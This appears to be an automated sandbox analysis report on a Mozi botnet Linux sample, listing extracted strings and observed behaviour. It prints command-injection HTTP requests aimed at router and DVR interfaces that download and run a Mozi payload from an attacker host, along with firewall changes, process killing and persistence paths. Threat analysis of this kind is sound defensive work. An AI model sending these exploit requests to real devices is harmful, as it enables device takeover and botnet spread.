                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
                Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
                Source: Initial samplePotential command found: mount -o remount,rw /overlay /
                Source: Initial samplePotential command found: mv -f %s %s
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: GET /c
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
                Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
                Source: Initial samplePotential command found: killall -9 %s
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
                Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
                Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
                Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                Source: Initial samplePotential command found: GET /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /%s HTTP/1.1
                Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
                Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
                Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
                Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
                Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
                Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: Mozi.m, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
                Source: classification engineClassification label: mal100.spre.troj.evad.linM@0/221@4/0

                Persistence and Installation Behavior:

                barindex
                Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
                Source: /bin/sh (PID: 4618)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
                Source: /tmp/Mozi.m (PID: 4580)File: /proc/4580/mountsJump to behavior
                Sample tries to persist itself using /etc/profileShow sources
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/apps-bin-path.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/Z97-byobu.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/bash_completion.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/profile.d/vte-2.91.shJump to behavior
                Sample tries to persist itself using System V runlevelsShow sources
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/rcS.d/S95baby.shJump to behavior
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/rc.localJump to behavior
                Terminates several processes with shell command 'killall'Show sources
                Source: /bin/sh (PID: 4584)Killall command executed: killall -9 telnetd utelnetd scfgmgr
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/230/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/231/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/232/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/233/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/234/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3512/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/359/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1452/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3632/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3518/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/10/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1339/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/11/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/12/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/13/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/14/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/15/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/16/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/17/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/18/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/19/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/483/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3527/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3527/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/2/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3525/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/1346/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3524/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3524/cmdline
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/4/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/3523/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/5/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/7/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/8/stat
                Source: /usr/bin/killall (PID: 4584)File opened: /proc/9/stat